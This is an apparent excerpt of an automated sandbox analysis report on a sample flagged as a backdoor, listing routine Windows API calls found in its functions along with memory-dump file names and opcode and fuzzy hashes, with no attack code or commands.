                                                Uniqueness Score: -1.00%

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
                                                Similarity
                                                • API ID: H_prolog
                                                • String ID:
                                                • API String ID: 3519838083-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
                                                Similarity
                                                • API ID: H_prolog
                                                • String ID:
                                                • API String ID: 3519838083-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • __EH_prolog.LIBCMT ref: 007D8384
                                                  • Part of subcall function 007D1380: __EH_prolog.LIBCMT ref: 007D1385
                                                  • Part of subcall function 007D1380: new.LIBCMT ref: 007D13FE
                                                  • Part of subcall function 007D19A6: __EH_prolog.LIBCMT ref: 007D19AB
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                • Associated: 00000000.00000002.1636004707.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636053941.0000000000803000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.000000000080E000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.0000000000814000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.0000000000825000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.000000000082D000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.0000000000831000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636165747.0000000000832000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
                                                Similarity
                                                • API ID: H_prolog
                                                • String ID:
                                                • API String ID: 3519838083-0
                                                • Opcode ID: c7a733c0db98d3e07713348f5c0f547fe6a87aa03be9221c9ec151df61bff7cc
                                                • Instruction ID: a3b7cc2eee7d09eff5d814263dca8df3e164b02c3a02318ec80810c31ac5f2e2
                                                • Opcode Fuzzy Hash: c7a733c0db98d3e07713348f5c0f547fe6a87aa03be9221c9ec151df61bff7cc
                                                • Instruction Fuzzy Hash: 1C41C231840694DADF60DB60CC59BEA73B8AF54300F4444EBE58AA7293DF785EC8DB51
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • __EH_prolog.LIBCMT ref: 007D1E05
                                                  • Part of subcall function 007D3B3D: __EH_prolog.LIBCMT ref: 007D3B42
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                • Associated: 00000000.00000002.1636004707.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636053941.0000000000803000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.000000000080E000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.0000000000814000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.0000000000825000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.000000000082D000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.0000000000831000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636165747.0000000000832000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
                                                Similarity
                                                • API ID: H_prolog
                                                • String ID:
                                                • API String ID: 3519838083-0
                                                • Opcode ID: 998da38c0596dd1d8d1d342169aabd405d0acc6026914d688a320be779066839
                                                • Instruction ID: 6abcf79a934f52c6567f00f83e29098ad0b5fe1c5e7153feaead71093829a0a0
                                                • Opcode Fuzzy Hash: 998da38c0596dd1d8d1d342169aabd405d0acc6026914d688a320be779066839
                                                • Instruction Fuzzy Hash: AC212672905148EECB11EFA9D9469EEBBF6BF58300B50016EE845A7351CB3A5E10CB60
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • __EH_prolog.LIBCMT ref: 007EA7C8
                                                  • Part of subcall function 007D1380: __EH_prolog.LIBCMT ref: 007D1385
                                                  • Part of subcall function 007D1380: new.LIBCMT ref: 007D13FE
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                • Associated: 00000000.00000002.1636004707.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636053941.0000000000803000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.000000000080E000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.0000000000814000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.0000000000825000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.000000000082D000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.0000000000831000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636165747.0000000000832000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
                                                Similarity
                                                • API ID: H_prolog
                                                • String ID:
                                                • API String ID: 3519838083-0
                                                • Opcode ID: 959f65231c14147918d2d6a0234193364f1436d92e1434364bb6f1346db600e4
                                                • Instruction ID: f8f00d6dfff81bd8f289a2ee7460f2a13e947ee4207acf4aa8a3bb18f13304f6
                                                • Opcode Fuzzy Hash: 959f65231c14147918d2d6a0234193364f1436d92e1434364bb6f1346db600e4
                                                • Instruction Fuzzy Hash: 24216B71C05289EACF15DF95C9569EEB7B4EF19300F4004AAE809A7242DB396E06CB61
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                • Associated: 00000000.00000002.1636004707.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636053941.0000000000803000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.000000000080E000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.0000000000814000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.0000000000825000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.000000000082D000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.0000000000831000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636165747.0000000000832000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
                                                Similarity
                                                • API ID: H_prolog
                                                • String ID:
                                                • API String ID: 3519838083-0
                                                • Opcode ID: 83bd2d51ec10666dee31d80ee797b4bfaf7cc6ffb97bb289e06d4f8cfb5f33b2
                                                • Instruction ID: 461821e39f73b1293f317001db50ae5cd5560a61d3fde5ab0cddfbd0980e64bb
                                                • Opcode Fuzzy Hash: 83bd2d51ec10666dee31d80ee797b4bfaf7cc6ffb97bb289e06d4f8cfb5f33b2
                                                • Instruction Fuzzy Hash: 24118E73A10529EBCF26AEA8CC459EEB736EF88750F054116FA05A7391DA388D10C7A0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                • Associated: 00000000.00000002.1636004707.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636053941.0000000000803000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.000000000080E000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.0000000000814000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.0000000000825000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.000000000082D000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.0000000000831000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636165747.0000000000832000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: dae87922ec1b8facf4cbd1f95d3770f60e2097a5265b52e6532e4d2d30c47c6e
                                                • Instruction ID: 7b1e339da4986ca5214092e67300d272baf5d2f2d6cfe1c16b06f51420d39904
                                                • Opcode Fuzzy Hash: dae87922ec1b8facf4cbd1f95d3770f60e2097a5265b52e6532e4d2d30c47c6e
                                                • Instruction Fuzzy Hash: 7AF08C30500B06AFDB30DE65C945616BBF8FB65320F20CA1BE496C2780E778E880C742
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • __EH_prolog.LIBCMT ref: 007D5BDC
                                                  • Part of subcall function 007DB07D: __EH_prolog.LIBCMT ref: 007DB082
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                • Associated: 00000000.00000002.1636004707.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636053941.0000000000803000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.000000000080E000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.0000000000814000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.0000000000825000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.000000000082D000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.0000000000831000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636165747.0000000000832000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
                                                Similarity
                                                • API ID: H_prolog
                                                • String ID:
                                                • API String ID: 3519838083-0
                                                • Opcode ID: 9c82357e86f39b9bdfd8b308046dc8670add8541c81ae8b695c34e04d947f556
                                                • Instruction ID: b42912083f2b82dd38a30eb6bee250cd85f1aa75d716400de5f64fb12ef29356
                                                • Opcode Fuzzy Hash: 9c82357e86f39b9bdfd8b308046dc8670add8541c81ae8b695c34e04d947f556
                                                • Instruction Fuzzy Hash: 9A016D34A05684DAC725F7A4C0593EDF7B49F5D700F40459EE85A53383CBB81B08C7A2
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • RtlAllocateHeap.NTDLL(00000000,?,00000000,?,007FC13D,00000000,?,007F67E2,?,00000008,?,007F89AD,?,?,?), ref: 007F854A
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                • Associated: 00000000.00000002.1636004707.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636053941.0000000000803000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.000000000080E000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.0000000000814000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.0000000000825000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.000000000082D000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.0000000000831000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636165747.0000000000832000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
                                                Similarity
                                                • API ID: AllocateHeap
                                                • String ID:
                                                • API String ID: 1279760036-0
                                                • Opcode ID: ed2efb9f103d3634dc4d812c1404fbda4a7a9ef6f493f659dec874a1123c35a9
                                                • Instruction ID: 114f4f2f8c5dc3453ed5335b1ca3abeec16bb19725fc629de92ed22cc19a5b77
                                                • Opcode Fuzzy Hash: ed2efb9f103d3634dc4d812c1404fbda4a7a9ef6f493f659dec874a1123c35a9
                                                • Instruction Fuzzy Hash: 8DE0A02154412D9BEBA127695C05B7A278C9F817A0F150220BB14AB391CE288C1085A7
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • FindCloseChangeNotification.KERNELBASE(000000FF,?,?,007D968F,?,?,?,?,00801FA1,000000FF), ref: 007D96EB
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                • Associated: 00000000.00000002.1636004707.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636053941.0000000000803000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.000000000080E000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.0000000000814000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.0000000000825000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.000000000082D000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.0000000000831000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636165747.0000000000832000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
                                                Similarity
                                                • API ID: ChangeCloseFindNotification
                                                • String ID:
                                                • API String ID: 2591292051-0
                                                • Opcode ID: dc5fa207aa6eaf4d40442ab67e87cadeedd7d9e8cad7d46cbd30f61dd5e8fdfe
                                                • Instruction ID: eafcca482a80ddb0ce25affcee1679e6bec07f27bb1f302bbbb5db8e08d7a762
                                                • Opcode Fuzzy Hash: dc5fa207aa6eaf4d40442ab67e87cadeedd7d9e8cad7d46cbd30f61dd5e8fdfe
                                                • Instruction Fuzzy Hash: C2F05E30556B048FDB308E24D949792B7F8AB12735F049B1F92E7536E0E769A88D8F10
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 007DA4F5
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                • Associated: 00000000.00000002.1636004707.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636053941.0000000000803000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.000000000080E000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.0000000000814000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.0000000000825000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.000000000082D000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.0000000000831000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636165747.0000000000832000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
                                                Similarity
                                                • API ID: CloseFind
                                                • String ID:
                                                • API String ID: 1863332320-0
                                                • Opcode ID: 0ece0e823886070d803618663103b25e38da7a124f9cae818efd7d1d362e8671
                                                • Instruction ID: 933b021f0f3001d789601adb7d3e5c8de54a4d975a106f4a82f3557cb69f8ae5
                                                • Opcode Fuzzy Hash: 0ece0e823886070d803618663103b25e38da7a124f9cae818efd7d1d362e8671
                                                • Instruction Fuzzy Hash: 13F0E9310097C0FBCA225B7848087C67BB07F15331F04CA0AF1FD02291C27D14959723
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • SetThreadExecutionState.KERNEL32(00000001), ref: 007E06B1
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                • Associated: 00000000.00000002.1636004707.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636053941.0000000000803000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.000000000080E000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.0000000000814000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.0000000000825000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.000000000082D000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.0000000000831000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636165747.0000000000832000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
                                                Similarity
                                                • API ID: ExecutionStateThread
                                                • String ID:
                                                • API String ID: 2211380416-0
                                                • Opcode ID: 4d4e1fd50a3353e7f2332d70320ed6e8d3db2a96d3a42bf316092abbc1a17d4c
                                                • Instruction ID: 4ad50bbc45293c42e958d82a3baa20064fc4dc2a5833990141addad05940be18
                                                • Opcode Fuzzy Hash: 4d4e1fd50a3353e7f2332d70320ed6e8d3db2a96d3a42bf316092abbc1a17d4c
                                                • Instruction Fuzzy Hash: 00D012256061D0A5D621336AAC0F7FE1B1A6FCAB10F094067B54E576C6CF9E08C656E2
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • GdipAlloc.GDIPLUS(00000010), ref: 007E9D81
                                                  • Part of subcall function 007E9B0F: GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 007E9B30
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                • Associated: 00000000.00000002.1636004707.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636053941.0000000000803000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.000000000080E000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.0000000000814000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.0000000000825000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.000000000082D000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.0000000000831000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636165747.0000000000832000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
                                                Similarity
                                                • API ID: Gdip$AllocBitmapCreateFromStream
                                                • String ID:
                                                • API String ID: 1915507550-0
                                                • Opcode ID: 4cf3c4e169e0f80c123d24ade4c43f63bdfd109b4bf71df52acedaf40aa9962d
                                                • Instruction ID: 2beabee848120866d25a96a4a3e56e812cc884bc448fa994e4006b31d7443230
                                                • Opcode Fuzzy Hash: 4cf3c4e169e0f80c123d24ade4c43f63bdfd109b4bf71df52acedaf40aa9962d
                                                • Instruction Fuzzy Hash: 04D0A73171624CFADF40FE768C0297E7BACEB08300F008025BE0886141EDB5DE10A261
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • GetFileType.KERNELBASE(000000FF,007D9887), ref: 007D9995
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                • Associated: 00000000.00000002.1636004707.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636053941.0000000000803000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.000000000080E000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.0000000000814000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.0000000000825000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.000000000082D000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.0000000000831000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636165747.0000000000832000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
                                                Similarity
                                                • API ID: FileType
                                                • String ID:
                                                • API String ID: 3081899298-0
                                                • Opcode ID: 8f7c0bfaff0d5287e3773fef44f9466333a6ffb9d42194040aa8471e7333c437
                                                • Instruction ID: 0ab88b749b819da366c894c59c4a62ebd721d42cb358c65e3978d0fa83d88831
                                                • Opcode Fuzzy Hash: 8f7c0bfaff0d5287e3773fef44f9466333a6ffb9d42194040aa8471e7333c437
                                                • Instruction Fuzzy Hash: DAD01231011540A58F6146354E1A0997775DBC3366B38D6A9D165C41A1D737D803F541
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • SendDlgItemMessageW.USER32(0000006A,00000402,00000000,?,?), ref: 007ED43F
                                                  • Part of subcall function 007EAC74: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 007EAC85
                                                  • Part of subcall function 007EAC74: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 007EAC96
                                                  • Part of subcall function 007EAC74: IsDialogMessageW.USER32(0001041A,?), ref: 007EACAA
                                                  • Part of subcall function 007EAC74: TranslateMessage.USER32(?), ref: 007EACB8
                                                  • Part of subcall function 007EAC74: DispatchMessageW.USER32(?), ref: 007EACC2
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                • Associated: 00000000.00000002.1636004707.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636053941.0000000000803000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.000000000080E000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.0000000000814000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.0000000000825000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.000000000082D000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.0000000000831000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636165747.0000000000832000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
                                                Similarity
                                                • API ID: Message$DialogDispatchItemPeekSendTranslate
                                                • String ID:
                                                • API String ID: 897784432-0
                                                • Opcode ID: 82f323f85a66dd895a094cff72fc2531d775f6dcfb133e74181f4a369d3d65c8
                                                • Instruction ID: 3e5ae122505fef3feb0b131f690b65865ffd3cb006fb3ea9b71ca5437c72a7ba
                                                • Opcode Fuzzy Hash: 82f323f85a66dd895a094cff72fc2531d775f6dcfb133e74181f4a369d3d65c8
                                                • Instruction Fuzzy Hash: 2CD09E31144300FBD6122B51CE07F0F7AA6BB88B04F004954B345740B1CA66AD20AB16
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • ___delayLoadHelper2@8.DELAYIMP ref: 007ED8A3
                                                  • Part of subcall function 007EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 007EDFD6
                                                  • Part of subcall function 007EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 007EDFE7
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                • Associated: 00000000.00000002.1636004707.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636053941.0000000000803000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.000000000080E000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.0000000000814000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.0000000000825000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.000000000082D000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.0000000000831000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636165747.0000000000832000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
                                                Similarity
                                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                • String ID:
                                                • API String ID: 1269201914-0
                                                • Opcode ID: 7e4fce47a58699832bcfe2943fe5f8a0fe32170897c9b42c630c07957f577b71
                                                • Instruction ID: 8fb7207d898cc7c38b9882ad7b2870ec31bcf171ab718a68c4bbac5380aec4a4
                                                • Opcode Fuzzy Hash: 7e4fce47a58699832bcfe2943fe5f8a0fe32170897c9b42c630c07957f577b71
                                                • Instruction Fuzzy Hash: 18B012B126E042EC315CA14B6D16D3A021CE4C8B10330401AB51DD02C0D4487D080431
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • ___delayLoadHelper2@8.DELAYIMP ref: 007ED8A3
                                                  • Part of subcall function 007EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 007EDFD6
                                                  • Part of subcall function 007EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 007EDFE7
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                • Associated: 00000000.00000002.1636004707.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636053941.0000000000803000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.000000000080E000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.0000000000814000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.0000000000825000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.000000000082D000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.0000000000831000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636165747.0000000000832000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
                                                Similarity
                                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                • String ID:
                                                • API String ID: 1269201914-0
                                                • Opcode ID: 8cea6e402e2360f69a5fe5a7cd546724f15c3003756d37f20fb58b460889738e
                                                • Instruction ID: d9ace1d6f595e2def31fb5d746beb78961d78c9cca9b91d899762b00ec45ea0a
                                                • Opcode Fuzzy Hash: 8cea6e402e2360f69a5fe5a7cd546724f15c3003756d37f20fb58b460889738e
                                                • Instruction Fuzzy Hash: C8B012B126E042EC315CA14A6E16D3A021CD4C8B10330401AB51DD02C0D4487E091431
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • ___delayLoadHelper2@8.DELAYIMP ref: 007ED8A3
                                                  • Part of subcall function 007EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 007EDFD6
                                                  • Part of subcall function 007EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 007EDFE7
